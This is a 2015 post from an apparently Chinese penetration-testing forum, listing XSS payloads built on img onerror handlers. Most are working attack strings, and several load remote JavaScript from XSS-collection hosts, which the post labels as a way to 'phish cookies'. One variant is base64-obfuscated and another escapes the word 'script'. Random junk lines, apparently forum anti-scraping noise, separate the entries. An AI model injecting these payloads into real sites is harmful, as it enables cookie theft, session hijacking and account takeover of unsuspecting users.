中国网络渗透测试联盟
标题:
img标签的常用几种测试手段
[打印本页]
作者:
admin
时间:
2015-10-18 14:33
标题:
img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">
" f7 m: r; O. s9 T3 C1 T" I
<img src=# onerror=alert(123)>
W) x% a0 L+ q5 l: x# B
<img src=# onerror=alert(document.cookie)>
& a0 Y4 u' p4 A! w' G6 u
下面是利用平台钓cookie的
1 ~" c9 h& y- k) v+ u
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
$ {- W5 g' l* K# D
6 Q4 M5 i. H# ^9 Z+ C" u
( D% l7 d8 U' Y6 S9 M
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
( T5 ?$ v3 ]0 P# r
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
j; F+ k' ]% z3 m& X& o# h: r
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
3 a5 [# x- n1 S
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
$ I. B1 V' ]6 q! F! W. E- S+ m% R
<img src="#">
- {! @7 d5 U$ L+ j3 H1 G
<img src="#">
& b3 H. k- P8 E- X6 r: q
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
8 C8 l+ t9 r6 [' w
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
D8 }* ?. O" u# J
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
2 d3 G. K. {* }+ B0 V7 ~
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
: l0 I5 {4 a3 ^0 o+ L
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
3 B3 C- F- @" ?9 E
<img src=x width="0" height="0"></img>
9 X: e- ^) `! Z! z! o5 A1 ?# @
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
2 c, J+ H( q7 ?* L7 j+ X: @
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
3 O8 p! l g0 E, D
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2